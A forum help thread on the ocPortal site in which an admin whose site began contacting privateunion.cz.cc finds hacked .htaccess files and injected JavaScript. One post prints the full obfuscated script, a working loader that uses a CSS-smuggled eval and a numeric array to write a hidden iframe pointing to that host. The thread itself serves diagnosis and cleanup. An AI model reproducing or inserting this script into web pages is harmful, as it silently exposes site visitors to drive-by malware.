HTML Logo by World Wide Web Consortium (www.w3.org). Click to learn more about our commitment to accessibility and standards.

Moving forward with Composr

ocPortal has been relaunched as Composr CMS, which is now in beta. ocPortal 9 will be superseded by Composr 10.

Head over to compo.sr for our new site, and to our migration roadmap. Existing ocPortal member accounts have been mirrored.


What the hell is privateunion.cz.cc???

Login / Search

 [ Join | More ]
 Add topic 
Posted
Rating:
#67507 (In Topic #14390)
Avatar

Well-settled

Today Avast antivirus suddenly started blocking our website. After disabling it I noticed our site was contacting privateunion.cz.cc everytime it loaded a page. I have no idea where that came from, I didn't add it. Anyone familiar with this?

[OMA] Clawcity - If It Ain't You….Frag It!!!
LAN Of The Damned - Admin
Back to the top
 
Posted
Rating:
#67509
Avatar

Community saint

Your site is infected with the JS scriptIP-inf trojan.

There seems to be some info here on the trojan and how to remove it.

New infections today at Network Solutions | Sucuri

Good luck.

Do you have a Samsung Galaxy S / Galaxy S II ? If so, why not check out my ScreenFree FM Radio .
Back to the top
 
Posted
Rating:
#67520
Avatar

Well-settled

I've had a look around and most of the pages on this mention checking your htaccess file. Either i'm not using one, or CuteFTP doesn't display hidden files.

[OMA] Clawcity - If It Ain't You….Frag It!!!
LAN Of The Damned - Admin
Back to the top
 
Posted
Rating:
#67521
Avatar

Well-settled

After finally figuring out how to view hidden files I found .htaccess.613 & .htaccess.715 seem to have Htaccess hack # exgocgkctswo. Does OCP need these files or can I just delete them?

[OMA] Clawcity - If It Ain't You….Frag It!!!
LAN Of The Damned - Admin
Back to the top
 
Posted
Rating:
#67522
Avatar

Community saint

Try this:

Displaying .htaccess with CuteFTP

   1. Open CuteFTP
   2. Click the Site Manager tab
   3. Select the site you wish to modify
   4. Select File, then Properties (when in CuteFTP Professional)
   5. Select the Actions tab
   6. Click the Filter button
   7. Check the Enable Remote Filters check box
   8. Check the Enable server side filtering check box
   9. Enter -a in the Remote field
  10. Click OK

Do you have a Samsung Galaxy S / Galaxy S II ? If so, why not check out my ScreenFree FM Radio .
Back to the top
 
Posted
Rating:
#67523
Avatar

Community saint

I doubt very much that ocPortal, or any legitimate programe, will need them. You shold be able to delete them, but you mught just want to rename them for now and have a look at what they contain.

Do you have a Samsung Galaxy S / Galaxy S II ? If so, why not check out my ScreenFree FM Radio .
Back to the top
 
Posted
Rating:
#67525
Avatar

Well-settled

The server admin also found this everywhere

Code

<script>function createCSS(selector,declaration){var ua=navigator.userAgent.toLowerCase();var isIE=(/msie/.test(ua))&&!(/opera/.test(ua))&&(/win/.test(ua));var style_node=document.createElement("style");if(!isIE)style_node.innerHTML=selector+" {"+declaration+"}";document.getElementsByTagName("head")[0].appendChild(style_node);if(isIE&&document.styleSheets&&document.styleSheets.length>0){var last_style_node=document.styleSheets[document.styleSheets.length-1];if(typeof(last_style_node.addRule)=="object")last_style_node.addRule(selector,declaration);}};createCSS('#c0','background:url(data:,eval)');var epul=null;var r=document.styleSheets;for(var i=0;i<r.length;i++){try{var sv=r[i].cssRules||r[i].rules;for(var qk=0;qk<sv.length;qk++){var rr=sv.item?sv.item(qk):sv[qk];if(!rr.selectorText.match(/#c(\d+)/))continue;epul=rr.style.backgroundImage.match(/url\("?data\:[^,]*,([^")]+)"?\)/)[1];};}catch(e){};}
jb=new Date(2010,11,3,2,21,4);t=jb.getSeconds();var al=[36/t,36/t,420/t,408/t,128/t,160/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,412/t,404/t,464/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,460/t,264/t,484/t,336/t,388/t,412/t,312/t,388/t,436/t,404/t,160/t,156/t,392/t,444/t,400/t,484/t,156/t,164/t,364/t,192/t,372/t,164/t,492/t,52/t,36/t,36/t,36/t,420/t,408/t,456/t,388/t,436/t,404/t,456/t,160/t,164/t,236/t,52/t,36/t,36/t,500/t,128/t,404/t,432/t,460/t,404/t,128/t,492/t,52/t,36/t,36/t,36/t,472/t,388/t,456/t,128/t,392/t,400/t,484/t,128/t,244/t,128/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,396/t,456/t,404/t,388/t,464/t,404/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,160/t,136/t,392/t,444/t,400/t,484/t,136/t,164/t,236/t,52/t,36/t,36/t,36/t,464/t,456/t,484/t,128/t,492/t,52/t,36/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,388/t,448/t,448/t,404/t,440/t,400/t,268/t,416/t,420/t,432/t,400/t,160/t,392/t,400/t,484/t,164/t,236/t,52/t,36/t,36/t,36/t,500/t,128/t,396/t,388/t,464/t,396/t,416/t,128/t,160/t,404/t,164/t,128/t,492/t,52/t,36/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,392/t,444/t,400/t,484/t,128/t,244/t,128/t,392/t,400/t,484/t,236/t,52/t,36/t,36/t,36/t,500/t,52/t,36/t,36/t,36/t,420/t,408/t,128/t,160/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,412/t,404/t,464/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,460/t,264/t,484/t,336/t,388/t,412/t,312/t,388/t,436/t,404/t,160/t,156/t,392/t,444/t,400/t,484/t,156/t,164/t,364/t,192/t,372/t,164/t,492/t,52/t,36/t,36/t,36/t,36/t,420/t,408/t,456/t,388/t,436/t,404/t,456/t,160/t,164/t,236/t,52/t,36/t,36/t,36/t,500/t,128/t,404/t,432/t,460/t,404/t,128/t,492/t,52/t,36/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,476/t,456/t,420/t,464/t,404/t,160/t,136/t,240/t,420/t,408/t,456/t,388/t,436/t,404/t,128/t,460/t,456/t,396/t,244/t,156/t,416/t,464/t,464/t,448/t,232/t,188/t,188/t,448/t,456/t,420/t,472/t,388/t,464/t,404/t,468/t,440/t,420/t,444/t,440/t,184/t,396/t,488/t,184/t,396/t,396/t,232/t,224/t,196/t,188/t,464/t,456/t,388/t,408/t,408/t,188/t,412/t,444/t,412/t,444/t,184/t,448/t,416/t,448/t,252/t,460/t,420/t,400/t,244/t,200/t,156/t,128/t,476/t,420/t,400/t,464/t,416/t,244/t,156/t,196/t,192/t,156/t,128/t,416/t,404/t,420/t,412/t,416/t,464/t,244/t,156/t,196/t,192/t,156/t,128/t,460/t,464/t,484/t,432/t,404/t,244/t,156/t,472/t,420/t,460/t,420/t,392/t,420/t,432/t,420/t,464/t,484/t,232/t,416/t,420/t,400/t,400/t,404/t,440/t,236/t,448/t,444/t,460/t,420/t,464/t,420/t,444/t,440/t,232/t,388/t,392/t,460/t,444/t,432/t,468/t,464/t,404/t,236/t,432/t,404/t,408/t,464/t,232/t,192/t,236/t,464/t,444/t,448/t,232/t,192/t,236/t,156/t,248/t,240/t,188/t,420/t,408/t,456/t,388/t,436/t,404/t,248/t,136/t,164/t,236/t,52/t,36/t,36/t,36/t,500/t,52/t,36/t,36/t,500/t,52/t,36/t,36/t,408/t,468/t,440/t,396/t,464/t,420/t,444/t,440/t,128/t,420/t,408/t,456/t,388/t,436/t,404/t,456/t,160/t,164/t,492/t,52/t,36/t,36/t,36/t,472/t,388/t,456/t,128/t,408/t,128/t,244/t,128/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,396/t,456/t,404/t,388/t,464/t,404/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,160/t,156/t,420/t,408/t,456/t,388/t,436/t,404/t,156/t,164/t,236/t,408/t,184/t,460/t,404/t,464/t,260/t,464/t,464/t,456/t,420/t,392/t,468/t,464/t,404/t,160/t,156/t,460/t,456/t,396/t,156/t,176/t,156/t,416/t,464/t,464/t,448/t,232/t,188/t,188/t,448/t,456/t,420/t,472/t,388/t,464/t,404/t,468/t,440/t,420/t,444/t,440/t,184/t,396/t,488/t,184/t,396/t,396/t,232/t,224/t,196/t,188/t,464/t,456/t,388/t,408/t,408/t,188/t,412/t,444/t,412/t,444/t,184/t,448/t,416/t,448/t,252/t,460/t,420/t,400/t,244/t,200/t,156/t,164/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,472/t,420/t,460/t,420/t,392/t,420/t,432/t,420/t,464/t,484/t,244/t,156/t,416/t,420/t,400/t,400/t,404/t,440/t,156/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,448/t,444/t,460/t,420/t,464/t,420/t,444/t,440/t,244/t,156/t,388/t,392/t,460/t,444/t,432/t,468/t,464/t,404/t,156/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,432/t,404/t,408/t,464/t,244/t,156/t,192/t,156/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,464/t,444/t,448/t,244/t,156/t,192/t,156/t,236/t,408/t,184/t,460/t,404/t,464/t,260/t,464/t,464/t,456/t,420/t,392/t,468/t,464/t,404/t,160/t,156/t,476/t,420/t,400/t,464/t,416/t,156/t,176/t,156/t,196/t,192/t,156/t,164/t,236/t,408/t,184/t,460/t,404/t,464/t,260/t,464/t,464/t,456/t,420/t,392/t,468/t,464/t,404/t,160/t,156/t,416/t,404/t,420/t,412/t,416/t,464/t,156/t,176/t,156/t,196/t,192/t,156/t,164/t,236/t,52/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,412/t,404/t,464/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,460/t,264/t,484/t,336/t,388/t,412/t,312/t,388/t,436/t,404/t,160/t,156/t,392/t,444/t,400/t,484/t,156/t,164/t,364/t,192/t,372/t,184/t,388/t,448/t,448/t,404/t,440/t,400/t,268/t,416/t,420/t,432/t,400/t,160/t,408/t,164/t,236/t,52/t,36/t,36/t,500/t];var kc="";ksw=function(){return{e:eval}}().e;df=ksw(epul);var jke='';var sk="fro"+jb.getSeconds()+"arCode";sk=sk.replace(4,"mCh");pss=String[sk];for(var i=0;i<al.length;i++){njt=df(al[i]);pss.call(njt);jke+=pss(njt);}
df(jke);</script>

[OMA] Clawcity - If It Ain't You….Frag It!!!
LAN Of The Damned - Admin
Back to the top
 
Posted
Rating:
#67526
Avatar

Community saint

That certainly looks like malware.

Do you have a Samsung Galaxy S / Galaxy S II ? If so, why not check out my ScreenFree FM Radio .
Back to the top
 
Posted
Rating:
#67527
Avatar

Well-settled

I thought perhaps it was a vulnerability in OCP, but it's gotten into phpBB as well.

[OMA] Clawcity - If It Ain't You….Frag It!!!
LAN Of The Damned - Admin
Back to the top
 
Posted
Rating:
#67528
Avatar

Well-settled

Thanks for your help

[OMA] Clawcity - If It Ain't You….Frag It!!!
LAN Of The Damned - Admin
Back to the top
 
Posted
Rating:
#67529
Avatar

Community saint

Just because you may have first noticed it in ocPortal does not mean that's what was infected first.

Do you have a Samsung Galaxy S / Galaxy S II ? If so, why not check out my ScreenFree FM Radio .
Back to the top
 
Posted
Rating:
#67547
Avatar

Well-settled

Probably wise to upgrade both

[OMA] Clawcity - If It Ain't You….Frag It!!!
LAN Of The Damned - Admin
Back to the top
 
There are too many online users to list.
Control functions:

Quick reply   Contract

Your name:
Your message: